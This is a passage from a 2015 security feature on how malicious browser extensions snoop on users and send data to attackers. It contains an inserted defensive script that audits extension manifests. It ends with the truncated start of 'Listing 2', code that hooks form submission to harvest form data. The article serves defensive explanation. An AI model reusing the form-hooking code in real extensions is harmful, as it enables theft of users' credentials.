17.06.2015

Spying on the browser: dissecting the design of malicious extensions
FEATURE

exploited to take control of the entire system. Related work on securing extensions has been done to show the process of designing secure extensions free from vulnerabilities.[5] Of course, malicious extensions do not care that extensions should be secure.

Generally, the aim of malicious extensions is to steal sensitive data from the user and transfer it to an attacker-controlled domain. Malicious extensions exploit the trust model used by the browser to set up a communication channel between the browser and the website. Usually, this process is completed when a session is created with a target website hosted on third-party servers. The point is that malicious extensions are not stopped by HTTP running over SSL. Most users have a false sense of security when websites use HTTPS. However, this is not justified, because HTTPS protects users only from transport-layer attacks. Ironically, HTTPS actually protects the malicious session from such attacks. HTTPS preserves the integrity of data in transit, but because the malicious code runs inside the browser, data can be manipulated even before it enters the network layer.

Why doesn't anti-malware software catch malicious extensions? Malicious extensions are not scanned by anti-malware solutions because extensions are considered to be secure components by default. We have seen some browser plug-in integrity checkers that detect the presence of secure and insecure plug-ins based on the version information. However, for extensions, this version-scanning technique is not effective, because extensions are not proprietary code used by vendors or software companies. As a result, malicious extensions are not caught by antivirus solutions.

The basic operation is:

1. A user visits a site that has been infected with malicious code.

2. The malicious site installs a malicious extension into the user's browser.

3. Within the browser, the malicious extension snoops on the user's browser activity.

4. Information collected by the malicious extension is sent to an attacker's remote server.
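Because antivirus software does not scan extensions (as discussed above), a practical defence is to audit what an installed extension is allowed to do. The following is an added example, not code from the article: a static audit of WebExtension manifest.json files that flags the capability combination steps 3 and 4 require, namely a content script injected into every site early enough to hook form submission, plus a route to arbitrary hosts. The manifest keys used (content_scripts, matches, run_at, all_frames, permissions, host_permissions) are real WebExtension keys; the function names auditManifest and riskLevel, the finding strings and the sample manifests are constructed for this example. Note that the article's Listing 2 targets the legacy Firefox overlay API (content.document), which predates this manifest format.

```javascript
// Added example (not from the article): static audit of WebExtension
// manifests for the capabilities a form-snooping extension needs.
// Manifest keys are real; function names and samples are constructed.

const BROAD_MATCHES = new Set([
  "<all_urls>", "*://*/*", "http://*/*", "https://*/*",
]);

function isBroadMatch(pattern) {
  return BROAD_MATCHES.has(pattern);
}

// Returns an array of distinct findings; empty means nothing this audit
// considers risky was requested.
function auditManifest(manifest) {
  const findings = new Set();

  for (const cs of manifest.content_scripts || []) {
    if (!(cs.matches || []).some(isBroadMatch)) continue;
    findings.add("content script injected into every site");
    // document_start runs before the page's own scripts, early enough to
    // register an onsubmit handler ahead of anything the page does.
    if (cs.run_at === "document_start") {
      findings.add("content script runs at document_start");
    }
    // all_frames also reaches login forms embedded in iframes.
    if (cs.all_frames === true) {
      findings.add("content script runs in all frames");
    }
  }

  const perms = new Set([
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
  ]);
  if ([...perms].some(isBroadMatch)) {
    findings.add("host permission for all URLs");
  }
  if (perms.has("webRequest")) {
    findings.add("can observe network requests (webRequest)");
  }
  if (perms.has("cookies")) {
    findings.add("can read cookies (cookies)");
  }
  return [...findings];
}

// high: runs on every page and either hooks in early or can reach/observe
// arbitrary hosts; medium: any single finding; low: none.
function riskLevel(findings) {
  if (findings.length === 0) return "low";
  const everywhere = findings.includes("content script injected into every site");
  const reach = findings.some((f) =>
    f.includes("document_start") || f.includes("all URLs") || f.includes("webRequest"));
  return everywhere && reach ? "high" : "medium";
}

// Constructed sample manifests; these are not real extensions.
const SAMPLE_MANIFESTS = {
  benign: {
    manifest_version: 3,
    name: "Example site helper",
    content_scripts: [{ matches: ["https://example.com/*"], js: ["helper.js"] }],
    permissions: ["storage"],
  },
  broadButIdle: {
    manifest_version: 3,
    name: "Reader mode",
    content_scripts: [{ matches: ["<all_urls>"], js: ["reader.js"], run_at: "document_idle" }],
    permissions: ["storage"],
  },
  suspicious: {
    manifest_version: 3,
    name: "Free coupons",
    content_scripts: [{
      matches: ["<all_urls>"], js: ["inject.js"], run_at: "document_start", all_frames: true,
    }],
    permissions: ["webRequest"],
    host_permissions: ["<all_urls>"],
  },
};

for (const [name, manifest] of Object.entries(SAMPLE_MANIFESTS)) {
  const findings = auditManifest(manifest);
  console.log(`${name}: ${riskLevel(findings)} ${JSON.stringify(findings)}`);
}
```

Run it with node; in practice you would feed it the manifest.json of each extension in a user's profile directory. A "high" result is not proof of malice (a password manager legitimately needs several of these capabilities), but it is exactly the profile a form-stealing extension must request, so it tells you which extensions deserve a look at their actual scripts.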

Listing 2: Wrapper function to steal data in forms

window.document.onsubmit = scan_forms;
// Scan the document forms
function scan_forms() {
    var forms = content.document.getElementsByTagName('form');
    for(var i=0; i
